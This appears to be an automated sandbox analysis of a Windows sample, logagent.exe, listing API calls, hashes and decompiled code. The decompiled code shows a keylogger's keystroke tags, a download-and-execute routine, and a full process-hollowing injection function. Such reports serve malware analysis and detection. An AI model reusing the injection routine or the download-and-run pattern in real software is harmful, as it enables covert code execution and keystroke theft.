                                  0x00404c6b
                                  0x00404c70
                                  0x00404c80
                                  0x00404c83
                                  0x00404c8d
                                  0x00404e83
                                  0x00404e86
                                  0x00404e8f
                                  0x00404e98
                                  0x00000000
                                  0x00404e9e
                                  0x00404c93
                                  0x00404cb2
                                  0x00404cfa
                                  0x00404d0c
                                  0x00404d19
                                  0x00404d27
                                  0x00404d30
                                  0x00404d3f
                                  0x00404d45
                                  0x00404d4e
                                  0x00404d56
                                  0x00404d5e
                                  0x00404d5e
                                  0x00404d6b
                                  0x00404d72
                                  0x00404d7c
                                  0x00404d86
                                  0x00404d90
                                  0x00404d97
                                  0x00404d9c
                                  0x00404d9f
                                  0x00404da8
                                  0x00404db6
                                  0x00404e44
                                  0x00404e47
                                  0x00000000
                                  0x00404dbc
                                  0x00404dc3
                                  0x00404dcf
                                  0x00404dd9
                                  0x00404de2
                                  0x00404ded
                                  0x00404df0
                                  0x00404e00
                                  0x00404e08
                                  0x00404e0c
                                  0x00404e16
                                  0x00404e20
                                  0x00404e25
                                  0x00404e31
                                  0x00404e3a
                                  0x00404e42
                                  0x00404e55
                                  0x00404e5e
                                  0x00404e67
                                  0x00404e70
                                  0x00000000
                                  0x00404e76
                                  0x00000000
                                  0x00404e42
                                  0x00404db6
                                  0x00404e7d
                                  0x00000000

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,770A9F40), ref: 00404C1F
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(77052590,?,770A9F40), ref: 00404C2F
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C39
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C43
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                  • wcscmp.MSVCRT ref: 00404CCA
                                  • wcscmp.MSVCRT ref: 00404CE2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                    • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(77052590,?,?,?), ref: 00404D7C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                  • String ID:
                                  • API String ID: 1504175218-0
                                  • Opcode ID: ba1188e37f3b68199102a69351d283cdde8ffe6f88333a592be0804aeeceea70
                                  • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                  • Opcode Fuzzy Hash: ba1188e37f3b68199102a69351d283cdde8ffe6f88333a592be0804aeeceea70
                                  • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405EB2 Relevance: 53.4, APIs: 3, Strings: 27, Instructions: 882COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,746B73F0,?), ref: 0040616A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                  • API String ID: 4257247948-3968991301
                                  • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                  • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D4E5 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 132filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                  • free.MSVCRT(?,C:\Windows\SysWOW64\logagent.exe,?), ref: 0040D643
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$open
                                  • API String ID: 2294739476-468372309
                                  • Opcode ID: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                  • Opcode Fuzzy Hash: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410145 Relevance: 31.7, APIs: 21, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6DF55DF0), ref: 0041016E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                  • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                    • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                    • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                    • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                  • String ID:
                                  • API String ID: 1196022968-0
                                  • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                  • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403325 Relevance: 27.1, APIs: 18, Instructions: 109fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                  • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                  • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                  • String ID:
                                  • API String ID: 3638635289-0
                                  • Opcode ID: 638da8c0f9d30b32452b2205bb7f10aace560869c675dcdd44485086082e4fb7
                                  • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                  • Opcode Fuzzy Hash: 638da8c0f9d30b32452b2205bb7f10aace560869c675dcdd44485086082e4fb7
                                  • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F219 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157injectionthreadmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0040F219() {
				void* _t59;
				void* _t60;
				void _t71;
				void* _t72;
				signed int _t74;
				CONTEXT* _t80;
				intOrPtr _t85;
				intOrPtr* _t93;
				signed int _t95;
				void* _t100;
				CONTEXT* _t110;
				struct _PROCESS_INFORMATION* _t114;
				void* _t115;
				void* _t117;

				L00413ECA();
				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				_t59 =  *(_t115 + 0xc);
				 *(_t115 - 0x74) = _t59;
				if( *_t59 != 0x5a4d) {
					L16:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
					_t60 = 0;
				} else {
					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
					if( *_t93 != 0x4550) {
						goto L16;
					} else {
						_t95 = 0x11;
						memset(_t115 - 0x60, 0, _t95 << 2);
						_t114 =  *(_t115 + 0x10);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
							goto L16;
						} else {
							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t115 - 0x70) = _t110;
							_t110->ContextFlags = 0x10007;
							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
								goto L16;
							} else {
								_t71 =  *(_t115 - 0x1c);
								if(_t71 ==  *(_t93 + 0x34)) {
									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
								}
								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
								 *(_t115 - 0x6c) = _t72;
								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
									goto L16;
								} else {
									_t74 = 0;
									 *(_t115 - 0x64) = 0;
									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
										_t100 =  *(_t115 + 0xc);
										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
										_t74 =  *(_t115 - 0x64);
									}
									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
										goto L16;
									} else {
										_t80 =  *(_t115 - 0x70);
										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
											goto L16;
										} else {
											_t60 = 1;
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
				return _t60;
			}

















                                  0x0040f21e
                                  0x0040f229
                                  0x0040f22c
                                  0x0040f247
                                  0x0040f24a
                                  0x0040f24d
                                  0x0040f255
                                  0x0040f3c7
                                  0x0040f3c7
                                  0x0040f3cb
                                  0x0040f25b
                                  0x0040f25e
                                  0x0040f260
                                  0x0040f269
                                  0x00000000
                                  0x0040f26f
                                  0x0040f271
                                  0x0040f277
                                  0x0040f279
                                  0x0040f27e
                                  0x0040f27f
                                  0x0040f280
                                  0x0040f281
                                  0x0040f29c
                                  0x00000000
                                  0x0040f2a2
                                  0x0040f2b2
                                  0x0040f2b4
                                  0x0040f2b7
                                  0x0040f2c9
                                  0x00000000
                                  0x0040f2f1
                                  0x0040f2f1
                                  0x0040f2f7
                                  0x0040f2fc
                                  0x0040f2fc
                                  0x0040f30e
                                  0x0040f314
                                  0x0040f319
                                  0x00000000
                                  0x0040f33a
